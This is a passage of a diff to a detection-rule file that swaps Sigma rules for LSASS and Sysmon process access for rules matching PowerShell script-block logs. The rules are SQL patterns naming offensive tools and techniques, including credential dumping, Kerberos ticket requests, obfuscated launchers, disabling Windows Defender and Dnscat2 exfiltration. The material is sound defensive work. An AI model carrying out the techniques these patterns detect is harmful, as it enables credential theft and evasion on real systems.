LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": 
"proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": 
"a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE 
'%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh 
Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP 
'.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 
'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": 
"proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": 
"Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the 
